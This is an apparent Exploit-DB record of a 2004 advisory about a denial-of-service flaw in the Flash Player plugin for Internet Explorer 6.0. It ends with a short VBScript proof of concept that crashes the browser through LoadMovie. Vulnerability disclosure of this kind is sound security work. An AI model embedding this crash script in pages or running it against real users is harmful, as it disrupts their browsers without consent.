Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service

EDB-ID:

23912

CVE:

N/A




Platform:

Windows

Date:

2004-04-06


source: https://www.securityfocus.com/bid/10057/info

It has been reported that Macromedia Flash Player for Internet Explorer may be prone to a denial of service vulnerability that may cause an instance of Internet Explorer to crash. The issue is reported to exist in the 'LoadMovie' function by calling the function and loading a flash movie into a non-zero level in the following manner:

LoadMovie 1,"c6ool.swf"

This vulnerability is reported to be tested in Flash Player 7.0 r19 running on WindowsXP Professional SP1 and SP2. 

<script language=vbscript>
Set mymy2= CreateObject("ShockwaveFlash.ShockwaveFlash.1")
mymy2.LoadMovie 1,"c6ool.swf"
</script>